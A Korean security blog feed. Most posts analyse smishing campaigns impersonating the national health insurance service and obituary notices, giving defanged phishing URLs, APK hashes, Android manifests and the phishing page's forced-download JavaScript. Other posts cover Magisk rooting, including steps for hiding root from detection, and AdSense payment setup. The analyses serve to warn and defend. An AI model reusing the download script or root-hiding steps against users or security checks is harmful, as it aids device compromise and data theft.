해당 스미싱은 건강검사 통지서 관련으로 국민건강보험 공단에서 보낸 것처럼 건강검진 안내 문구를 사칭해 스미싱 문자를 보내는 형태입니다. 해당 문자는 건강보험, 건강검사, 건강검진, 통지서, 통보문, 통보서 등 이러한 문구가 포함되며, 건강 검진 결과 확인을 위해 URL 클릭을 유도 하는 형태이고, 해당 URL을 클릭하면 개인정보 입력 후 최종적으로 악성 앱을 다운로드하는 형태입니다.

스미싱 문구

[Web발신] 건강검사보험 통보문 전달완료 hxxp://yhsgwac[.]lat

건강검진 문자 (스미싱)

정상 배포 방식

건강보험 앱

※ 정상 배포방식은 원스토어, 구글플래이 해당 사이트(어플)를 통해서만 배포합니다.

피싱 사이트 접속 화면

건강보험 피싱 사이트

다운로드

피싱 사이트 URL 주소

hxxp://yhsgwac[.]lat/  (번호 입력 페이지)
hxxp://yhsgwac[.]lat/info.html (이름 생년월일 입력 페이지)
hxxp://yhsgwac[.]lat/finish.html (다운로드 페이지)
hxxp://yhsgwac[.]lat/download (최종 유포지)

해당 사이트는 건강보험 공단 사칭하는 피싱 사이트로 번호입력, 이름, 생년월일을 입력하면 다음 페이지로 넘어가고 최종적으로 "다운로드" 버튼을 누르면 최종적으로 악성앱이 다운로드되는 형태입니다. 해당 악성앱 이름은 신기하게도 "인터넷" 입니다..

페이지 분석

정보 유출

해당 피싱 사이트는 페이지를 넘어갈 때 입력한 개인정보들이 공격자(서버)에 넘어가는 것을 확인할 수 있습니다. 사용자가 입력한 정보(개인정보)를 공격자가 악의적으로 이용 가능 하기 때문에 주의가 필요 합니다.

APK 파일 정보

App Name : 인터넷
package : com.agshacs.pt
MD5 : F49F3B7E471BEDDEB215D0D6AB4F9BBA
SHA-1 : DBFE08EC5028B4255A87C109D89661B6CE3C688E

virustotal 결과

Virustotal에 해쉬 검색시 12개에 백신에서 탐지 된것을 확인 할 수 있다.

Android Manifest

Activities 1 , Services 1, Receivers 1, Providers 1

<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" android:versionCode="10017" android:versionName="1.0.17" android:compileSdkVersion="31" android:compileSdkVersionCodename="12" package="com.agshacs.pt" platformBuildVersionCode="31" platformBuildVersionName="12">
    <uses-sdk android:minSdkVersion="21" android:targetSdkVersion="31"/>
    <uses-feature android:name="android.hardware.telephony" android:required="false"/>
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.READ_SMS"/>
    <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
    <uses-permission android:name="android.permission.FOREGROUND_SERVICE"/>
    <uses-permission android:name="android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS"/>
    <application android:theme="@style/Theme.Xms" android:label="@string/app_name" android:icon="@drawable/icon" android:allowBackup="false" android:supportsRtl="true" android:usesCleartextTraffic="true" android:roundIcon="@drawable/icon" android:appComponentFactory="androidx.core.app.CoreComponentFactory">
        <activity android:name="com.agshacs.pt.MainActivity" android:exported="true">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity>
        <service android:name="com.agshacs.pt.core.XmsService" android:enabled="true" android:exported="true"/>
        <receiver android:name="com.agshacs.pt.core.BootReceiver" android:exported="true">
            <intent-filter android:priority="999">
                <action android:name="android.intent.action.BOOT_COMPLETED"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </receiver>
        <provider android:name="androidx.startup.InitializationProvider" android:exported="false" android:authorities="com.agshacs.pt.androidx-startup">
            <meta-data android:name="androidx.emoji2.text.EmojiCompatInitializer" android:value="androidx.startup"/>
            <meta-data android:name="androidx.lifecycle.ProcessLifecycleInitializer" android:value="androidx.startup"/>
        </provider>
    </application>
</manifest>

Android Permission

권한	설명
android.permission.INTERNET	인터넷에 액세스할 수 있게 합니다.
android.permission.READ_SMS	SMS 메시지를 읽을 수 있게 합니다.
android.permission.READ_PHONE_STATE	전화 상태 및 장치 정보에 액세스할 수 있게 합니다.
android.permission.RECEIVE_BOOT_COMPLETED	기기 부팅 시 앱을 자동으로 시작할 수 있게 합니다.
android.permission.FOREGROUND_SERVICE	포그라운드 서비스를 실행할 수 있게 합니다.
android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS	배터리 최적화를 무시하도록 요청할 수 있게 합니다.

코드 분석

Web View(정상 사이트)
베터리 최적화
부팅시 자동 실행
각종 정보 수집
sms 정보수집
정보 유출
프록시 설정을 위한 웹 브라우저 연결

1. 앱 실행 시 정상 사이트를 보여줌

정상 사이트 "m.naver.com" 페이지의 화면을 보여주며 정상 앱인것 처럼 사용자를 속인다.

2. 베터리 최적화

3. 부팅시 자동 실행

4. 앱 권한 요청

5. 각종 정보 수집

핸드폰번호, sim 번호, IMEI 번호, 통신사 정보 수집

6. SMS 정보 수집 및 유출

7. 유출지 (C&C)정보

8. 정보 유출 형태

유출 형태

9. 프록시 설정을 위한 웹 브라우저 연결

웹 브라우저 연결

프록시 설정

휴대전화 보안 그리고 악성 앱 제거 방법

국민건강보험 사칭 피싱 사이트 (23.09.02)

카고형 — Sat, 2 Sep 2023 14:45:17 +0900

이번에는 공공기관 사칭 스미싱인 국민건강보험 피싱 사이트입니다. URL 클릭 금지..

해당 스미싱은 건강검사 통지서 관련으로 국민건강보험 공단에서 보낸 것처럼 건강검진 안내 문구를 사칭해 스미싱 문자를 보내는 형태이다. 해당 문자는 건강보험, 건강검사, 건강검진, 통지서, 통보문, 통보서 등 이러한 문구가 포함되며, 확인을 위해 URL 클릭을 유도 하는 형태이다. 해당 URL을 클릭하면 개인정보 입력 후 최종적으로 악성 앱을 다운로드하는 형태입니다.

스미싱 문구

[Web발신] 건강검사보험 통보문 전달완료 hxxp://yhsgwac[.]lat

건강검진 문자 (스미싱)

정상 배포 방식

건강보험 앱

※ 정상 배포방식은 원스토어, 구글플래이 해당 사이트(어플)를 통해서만 배포합니다.

피싱 사이트 접속 화면

건강보험 피싱 사이트

피싱 사이트 URL 주소

hxxp://yhsgwac[.]lat/  (번호 입력 페이지)
hxxp://yhsgwac[.]lat/info.html (이름 생년월일 입력 페이지)
hxxp://yhsgwac[.]lat/finish.html (다운로드 페이지)
hxxp://yhsgwac[.]lat/download (최종 유포지)

해당 사이트는 건강보험 공단 사칭하는 피싱 사이트로 번호입력, 이름, 생년월일을 입력하면 다음 페이지로 넘어가고 최종적으로 "다운로드" 버튼을 누르면 최종적으로 악성앱이 다운로드되는 형태입니다.

페이지 분석

정보 유출

해당 피싱 사이트는 페이지를 넘어갈 때 입력한 개인정보들이 공격자(서버)에 넘어가는 것을 확인할 수 있습니다.

휴대전화 보안 그리고 악성 앱 제거 방법

지인(부고장) 사칭 피싱 사이트 (23.08.19)

카고형 — Sat, 2 Sep 2023 14:05:35 +0900

이번에 지인 관련 스미싱인 부고장 사칭 피싱 사이트입니다. URL 클릭 금지..

해당 스미싱은 지인 사칭으로 배포되고 있다. 비슷 한 문구로는 결혼식, 돌잔치, 지인 행사 등이 있지만 이번에는 부고장 관련 문구로 배고 되고 있는 듯하다. 해당 URL 접속 시 부고장 피싱 페이지가 보인다 생각보다 페이지를 잘 만들었고, "장례절차 확인하기" 버튼 클릭 시 악성앱이 다운된다.

문구)

[Web발신] [부고]18일 저녁 10시경 부친께서 별세하셨습니다. 안내 http://xn02[.]h8gd[.]hair

악성앱 다운로드 과정

피싱 메인 페이지

해당 스미싱에 있는 주소를 접속하게되면 모바일 부고장 피싱 사이트에 접속 하게 된다. 해당 사이트를 보면 상당히 잘 만들어 진걸 볼 수 있다.

피싱 사이트

이번 스미싱은 스미싱 문구나 해당 페이지 접속할 때 고인의 정보나 상주의 정보를 확인할 수 없다. 상주나 고인의 정보를 확인 하기 위해서는 "장례절차 확인하기" 버튼를 눌러야 확인 할 수 있는것 처럼 만든거 같다. 이때 해당 버튼을 누르게 되면 악성앱을 다운로드하게 된다. (피싱 사이트 접속은 이미 확인을 하기 위해 스미싱에 있는 URL을 누른 거 기 때문에 버튼을 누르지 않을까 함...)

HTML 분석

해당 페이지는 부고장 이미지를 보여주고, 버튼 클릭 시 악성앱을 다운로드 하게 된다.

function click_download() {
    var link = document.createElement("a");
    link.download = "부고장";
    link.href = '/download/the.apk';
    document.body.appendChild(link);
    link.click();
    document.body.removeChild(link);
    delete link;
	$.ajax({
		type: "POST",
		url: `xinde/update_download.php`,
		data: { "ipaddr": ipaddr, "hostname": window.location.hostname },
		success: function(resp) {
			if(resp.success) {
				sessionStorage.setItem("page", 3);
			} else {
			}
		},
		error: function() {
		}
	});
}

악성앱 다운

해당 악성앱 다운 시 각종 기기정보, 개인정보, sms 정보 수집을 하고, 수집된 정보를 특정 C&C 서버 주소로 유출 행위를 한다.

휴대전화 보안 그리고 악성 앱 제거 방법

[악성 앱] 모바일 부고장 사칭 악성앱 분석 (23.08.20)

카고형 — Sun, 20 Aug 2023 08:00:41 +0900

이번에 지인 관련 스미싱인 부고장 사칭 악성 앱 입니다.

해당 스미싱은 지인 사칭으로 배포되고 있다. 비슷 한 문구로는 결혼식, 돌잔치, 지인 행사 등이 있지만 이번에는 부고장 관련 문구로 배고 되고 있는 듯하다. 해당 URL 접속 시 부고장 피싱 페이지가 보인다. 생각보다 페이지를 잘 만들었다고 생각이 든다. 해당 페이지에서 "장례절차 확인하기" 버튼 클릭 시 악성앱이 다운된다.

문구)

[Web발신] [부고]18일 저녁 10시경 부친께서 별세하셨습니다. 안내 http://xn02[.]h8gd[.]hair

악성앱 다운로드 과정

피싱 메인 페이지

해당 스미싱에 있는 주소를 접속하게되면 모바일 부고장 피싱 사이트에 접속 하게 된다. 해당 사이트를 보면 상당히 잘 만들어 진걸 볼 수 있다.

이번 스미싱은 스미싱 문구나 해당 페이지 접속 할 때 고인의 정보나 상주의 정보를 확인할 수 없다. 상주나 고인의 정보를 확인 하기 위해서는 "장례절차 확인하기" 버튼를 눌러야 확인 할 수 있는것 처럼 만든거 같다. 이때 해당 버튼을 누르게 되면 악성앱을 다운로드하게 된다.

고인의 정보나 상주 정보를 확인을 위해 버튼 클릭(악성 앱 다운)을 유도 하는 페이지인것으로 확인 할 수 있다.

※ 정상 배포방식은 원스토어, 구글플래이 해당 사이트(어플)를 통해서만 배포합니다.
※ 대부분의 정상 앱은 일반 사용자에게 특별한 접근 출처를 알 수 없는 앱 설치 권한을 요구 하지 않습니다.

정상 구글 플레이 스토어 배포

HTML 분석

해당 페이지는 버튼 클릭을 위한 부고장 이미지를 보여주고, 버튼 클릭 시 특정 주소로 연결되어 악성앱을 다운로드 하게 되는 것을 확인 할 수 있다.

function click_download() {
    var link = document.createElement("a");
    link.download = "부고장";
    link.href = '/download/the.apk';
    document.body.appendChild(link);
    link.click();
    document.body.removeChild(link);
    delete link;
	$.ajax({
		type: "POST",
		url: `xinde/update_download.php`,
		data: { "ipaddr": ipaddr, "hostname": window.location.hostname },
		success: function(resp) {
			if(resp.success) {
				sessionStorage.setItem("page", 3);
			} else {
			}
		},
		error: function() {
		}
	});
}

유포지 : https://xn02[.]h8gd[.]hair/
최종 유포지 : https://xn02[.]h8gd[.]hair/download/the.apk

APK 파일 정보

App Name : 모바일 부고장
package : com.xguvpaxbfeua.slr
MD5 : E334D0415B39167AD575FCF5B0226389
SHA-1 : 46411E6011AD611DE892EC118138FA58C7EA9670

Virustotal 결과

Android Manifest

Activities 1 , Services 1, Receivers 1, Providers 1

<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android" android:versionCode="1" android:versionName="1.0" android:compileSdkVersion="33" android:compileSdkVersionCodename="13" package="com.xguvpaxbfeua.slr" platformBuildVersionCode="33" platformBuildVersionName="13">
    <uses-sdk android:minSdkVersion="24" android:targetSdkVersion="33"/>
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
    <uses-permission android:name="android.permission.READ_PRIVILEGED_PHONE_STATE"/>
    <uses-feature android:name="android.hardware.telephony" android:required="false"/>
    <uses-permission android:name="android.permission.READ_SMS"/>
    <uses-permission android:name="android.permission.RECEIVE_SMS"/>
    <uses-permission android:name="android.permission.RECEIVE_MMS"/>
    <uses-permission android:name="android.permission.SEND_SMS"/>
    <uses-permission android:name="android.permission.READ_PHONE_STATE" android:maxSdkVersion="29"/>
    <uses-permission android:name="android.permission.READ_PHONE_NUMBERS"/>
    <uses-permission android:name="android.permission.VIBRATE"/>
    <permission android:name="com.xguvpaxbfeua.slr.DYNAMIC_RECEIVER_NOT_EXPORTED_PERMISSION" android:protectionLevel="signature"/>
    <uses-permission android:name="com.xguvpaxbfeua.slr.DYNAMIC_RECEIVER_NOT_EXPORTED_PERMISSION"/>
    <application android:theme="@style/Theme.App17" android:label="@string/app_name" android:icon="@mipmap/ic_launcher" android:debuggable="true" android:allowBackup="true" android:supportsRtl="true" android:extractNativeLibs="false" android:fullBackupContent="@xml/backup_rules" android:usesCleartextTraffic="true" android:networkSecurityConfig="@xml/network_security_config" android:appComponentFactory="androidx.core.app.CoreComponentFactory" android:dataExtractionRules="@xml/data_extraction_rules">
        <activity android:name="com.xguvpaxbfeua.slr.MainActivity" android:exported="true">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity>
        <service android:name="com.xguvpaxbfeua.slr.LoopService" android:enabled="true" android:exported="true"/>
        <receiver android:name="com.xguvpaxbfeua.slr.Mopiotal" android:exported="true">
            <intent-filter android:priority="2147483647">
                <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
            </intent-filter>
        </receiver>
        <provider android:name="androidx.startup.InitializationProvider" android:exported="false" android:authorities="com.xguvpaxbfeua.slr.androidx-startup">
            <meta-data android:name="androidx.emoji2.text.EmojiCompatInitializer" android:value="androidx.startup"/>
            <meta-data android:name="androidx.lifecycle.ProcessLifecycleInitializer" android:value="androidx.startup"/>
        </provider>
    </application>
</manifest>

Android Permission

권한	설명
android.permission.INTERNET	인터넷에 연결하여 네트워크 통신을 수행할 수 있도록 합니다.
android.permission.ACCESS_NETWORK_STATE	네트워크 상태에 대한 정보를 액세스하고, 연결 가능 여부 등을 확인할 수 있도록 합니다.
android.permission.READ_PRIVILEGED_PHONE_STATE	특권화된 권한으로, 기기의 통화 상태와 관련된 정보를 읽을 수 있습니다.
android.permission.READ_SMS	SMS 메시지를 읽을 수 있도록 합니다.
android.permission.RECEIVE_SMS	SMS 메시지를 수신할 수 있도록 합니다.
android.permission.RECEIVE_MMS	MMS(Multimedia Messaging Service) 메시지를 수신할 수 있도록 합니다.
android.permission.SEND_SMS	SMS 메시지를 발신할 수 있도록 합니다.
android.permission.READ_PHONE_STATE	기기의 전화 상태와 관련된 정보를 읽을 수 있습니다.
android.permission.READ_PHONE_NUMBERS	기기에 저장된 전화 번호를 읽을 수 있도록 합니다.
android.permission.VIBRATE	기기 진동 변경 할 수 있도록 합니다.

코드 분석

모바일 부고장 사칭 앱은 각종 기기정보, 개인정보, sms 정보 수집을 하고, 수집된 정보를 특정 C&C 서버 주소로 유출 행위를 한다. 또한 사용자를 속이기 위해 정상 사이트를 보여준다.

UUID 생성 및 저장
Web View(정상 사이트)
각종 정보 수집
sms 정보수집
sms 수신시 진동 및 소리 제어
정보 유출

1. 앱 실행 시 UUID 생성 및 저장

서버에서 식별자 역할을 할 것으로 추정된다

2. 앱 실행 시 정상 사이트를 보여줌

정상 사이트 "부고장.kr" 페이지의 화면을 보여주며 정상 앱인것 처럼 사용자를 속인다.

3. 앱 권한 요청

3. 각종 정보 수집

핸드폰번호, sim 번호, IMEI 번호, 통신사 정보 수집

4. SMS 수신 시 볼륨 설정 및 진동 제어 기능

5. SMS 정보 수집 및 유출

6. 유출지 (C&C)정보

7. 유출 시 사용되는 API

8. 정보 유출

사용 되는 API에 따라 유출되는 정보

휴대전화 보안 그리고 악성 앱 제거 방법

Magisk Manager 란?

카고형 — Wed, 2 Aug 2023 01:05:06 +0900

Magisk는 Android 기기에서 시스템 루트 권한(Root)을 얻고, 시스템 수정을 할 수 있게 해주는 오픈 소스 프로젝트입니다. 기본적으로 Android 운영 체제는 시스템 루트 권한을 가지고 있지 않아서 시스템 설정을 변경하거나 앱의 루트 권한이 필요한 기능을 사용할 수 없습니다. 그러나 Magisk를 사용하면 Android 기기에 루트 권한을 부여하여 이러한 제한을 우회할 수 있습니다.

Magisk는 시스템의 내부에서 루트 권한을 얻는데 사용되며, 이를 통해 다양한 기능과 모듈을 설치할 수 있습니다. Magisk의 가장 큰 장점 중 하나는 시스템 파티션을 변경하지 않고 루트 권한을 얻을 수 있다는 점입니다. 이렇게 함으로써 시스템의 무결성을 유지하면서도 루트 권한을 이용할 수 있어서 안정적이고 보안적으로도 유리합니다.

Magisk의 주요 기능과 장점:

시스템 루트 권한 얻기: Magisk를 설치하면 기기에 루트 권한을 얻을 수 있습니다. 이를 통해 기기의 시스템 설정을 변경하거나 루트 권한을 요구하는 앱과 기능을 사용할 수 있습니다.

시스템 무결성 유지: Magisk는 시스템 파티션을 수정하지 않고 루트 권한을 얻으므로 시스템의 무결성을 유지할 수 있습니다.

Systemless 모드: Magisk의 시스템리스(Systemless) 모드를 사용하면 기기의 시스템 파티션을 건드리지 않고도 모듈을 설치하고 관리할 수 있습니다. 이는 OTA(Over-The-Air) 업데이트를 받을 때 유용합니다.

Magisk 모듈: Magisk 모듈은 기기에 기능을 추가하거나 수정할 수 있는 확장 기능입니다. 사용자는 Magisk 모듈을 설치하여 기기에 원하는 기능을 추가하거나 커스터마이징할 수 있습니다.

SafetyNet 우회: Magisk의 시스템리스 모드를 사용하면 SafetyNet API 검사를 우회하여 루트 권한을 가진 기기에서도 Google Pay 및 기타 SafetyNet을 사용하는 앱을 실행할 수 있습니다.

하지만 Magisk는 시스템 루트 권한을 얻는 것이므로 오용할 경우 안전성과 보안에 문제가 발생할 수 있습니다. 루트 권한을 가진 상태에서는 신중하게 사용해야 하며, 신뢰할 수 없는 소스로부터의 앱 또는 모듈 설치에 주의해야 합니다. 또한 일부 은행 앱이나 보안 감지 앱에서 Magisk 루트 권한을 감지하고 동작을 차단하는 경우가 있으므로 주의가 필요합니다.

root hide 기능 이용 하는법

실제 기기 루팅 된 기기에서 할 수 있음 루팅방법

Magisk Manager - 설정 - Zygisk - DenyList 구성 - 타겟앱 - 재 부팅

https://magiskmanager.com/#What_is_Magisk_Hide

[AdSense] 애드샌스 수익 지급을 위한 결제 수단 추가 방법

카고형 — Fri, 28 Jul 2023 22:38:55 +0900

Google AdSense는 웹사이트 소유자와 블로거들이 온라인 광고를 통해 콘텐츠를 수익화하는 편리한 방법을 제공 합니다. 수익금을 받기 위해서는 AdSense 계정에 결제 수단을 등록해야 하고. 이 단계별 가이드에서는 은행 송금를 통해 결제 수단을 추가하는 방법을 안내해 드리겠습니다.

1. Google AdSense에 접속

Google AdSense 계정으로 로그인합니다. Tistory 블로그을 사용 중이라면 "블로그 관리" > "수익" > "애드센스 관리"로 이동한 후 "정산하기" 링크를 클릭하여 Google AdSense 결제정보 화면에 접속합니다.

티스토리 애드센스 관리 화면

2. 결제 수단 추가하기

결제 수단을 등록하기 전에 결제 수단 추가 링크를 클릭합니다.

3. 은행으로 결제 수단 선택하기

이동한 화면에서 결제 수단 종류로 "새 은행 송금 세부 정보 추가"를 선택합니다.

4. 은행 송금 세부정보 추가하기

아래 화면에서 은행 송금 세부정보를 입력합니다. 다음 정보를 참고하여 수익을 받을 은행 정보를 입력합니다.

수취인 ID: 선택사항이며 입력하지 않아도 됩니다.
예금주의 이름: 예금주(본인) 이름을 영문으로 입력합니다.
은행 이름: 수익금을 받을 계좌의 은행 이름을 영문으로 입력합니다.
SWIFT 은행 식별 코드(BIC): 수익금을 받을 계좌의 은행 식별 코드를 입력합니다. 한국 은행의 SWIFT 코드는 제공된 표를 참고하세요.
계좌 번호: 수익금을 받을 계좌번호를 입력합니다.
계좌 번호 재입력: 수익금을 받을 계좌번호를 다시 입력합니다.
중개 은행, FFC 또는 FBO: 선택사항이며 입력하지 않아도 됩니다.

SWIFT 은행 식별 코드(BIC)

은행명	은행 영문명	SWIFT Code(BIC)
한국은행	BANK OF KOREA	BOKRKRSE
KDB산업은행	KOREA DEVELOPMENT BANK	KODBKRSE
기업은행	INDUSTRIAL BANK OF KOREA	IBKOKRSE
국민은행	KOOKMIN BANK	CZNBKRSE
수협은행	SUHYUP BANK	NFFCKRSE
농협은행	NATIONAL AGRICULTURAL	NACFKRSEXXX
우리은행	WOORI BANK	HVBKKRSEXXX
SC제일은행	STANDARD CHARTERED FIRST BANK KOREA	SCBLKRSE
씨티은행	CITIBANK KOREA	CITIKRSX
대구은행	DAEGU BANK	DAEBKR22
부산은행	BUSAN BANK	PUSBKR2P
광주은행	KWANGJU BANK	KWABKRSE
제주은행	JEJU BANK	JJBKKR22
전북은행	JEONBUK BANK	JEONKRSE
경남은행	KYONGNAM BANK	KYNAKR22XXX
우체국은행	KOREA POST OFFICE	SHBKKRSEPO
하나은행	KEB HANA BANK	KOEXKRSE
신한은행	SHINHAN BANK	SHBKKRSE
카카오뱅크	KAKAOBANK OF KOREA CORP	KAKOKR22

이 간단한 단계들을 따라가면 Google AdSense 계정에 결제 수단을 추가할 수 있으며, 은행 송금을 통해 손쉽게 수익을 받을 수 있습니다. 또한, 수표로 지급받기를 원하신다면 결제 수단 설정 과정에서 해당 옵션을 선택하실 수 있습니다. 결제 수단을 등록하면 여러분의 노고와 열정으로 만든 온라인 콘텐츠의 보상을 즐길 준비가 됩니다. 행운을 빕니다!